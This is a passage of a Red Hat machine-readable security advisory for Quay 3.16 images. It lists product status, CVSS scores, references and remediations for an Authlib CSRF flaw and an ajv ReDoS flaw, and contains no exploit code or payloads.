"text": "This vulnerability is rated Moderate for Red Hat products utilizing Authlib, such as Red Hat Ansible Automation Platform, Hosted OpenShift Clusters, Red Hat Quay, and Red Hat Satellite. The flaw arises from improper session management in Authlib\u0027s cache-backed state storage, allowing a remote attacker to perform Cross-Site Request Forgery (CSRF) by obtaining a valid state.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-68158"
},
{
"category": "external",
"summary": "RHBZ#2428102",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2428102"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-68158",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68158"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-68158",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68158"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/2808378611dd6fb2532b189a9087877d8f0c0489",
"url": "https://github.com/authlib/authlib/commit/2808378611dd6fb2532b189a9087877d8f0c0489"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/7974f45e4d7492ab5f527577677f2770ce423228",
"url": "https://github.com/authlib/authlib/commit/7974f45e4d7492ab5f527577677f2770ce423228"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/security/advisories/GHSA-fg6f-75jq-6523",
"url": "https://github.com/authlib/authlib/security/advisories/GHSA-fg6f-75jq-6523"
}
],
"release_date": "2026-01-08T17:58:17.724000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T15:21:25+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6567"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "Authlib: Authlib: Cross-Site Request Forgery due to improper session management in state storage"
},
{
"cve": "CVE-2025-69873",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-11T19:01:32.953264+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439070"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in ajv. When the $data option is enabled, the value of the pattern keyword is passed directly to the JavaScript RegExp() constructor without sufficient validation. An attacker able to supply a malicious regular expression pattern can trigger a ReDoS (Regular Expression Denial of Service), causing the application to become unresponsive and resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "ajv: ReDoS via $data reference",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, the $data option must be enabled and the attacker needs to be able to send a payload with a specially crafted regular expression to the application processing the input. A 31-character payload causes approximately 44 seconds of execution, with each additional character doubling the execution time. Therefore, even a small payload can cause an application to become unresponsive and eventually result in a denial of service. Due to this reason, this flaw has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-69873"
},
{
"category": "external",
"summary": "RHBZ#2439070",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439070"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-69873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69873"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873"
},
{
"category": "external",
"summary": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md",
"url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md"
}
],
"release_date": "2026-02-11T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T15:21:25+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6567"
},
{
"category": "workaround",
"details": "To mitigate this issue, disable the $data feature if your application does not require it. If $data must be used, implement strict validation of the input fields that are referenced by the pattern keyword to ensure they contain only expected and safe characters.",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
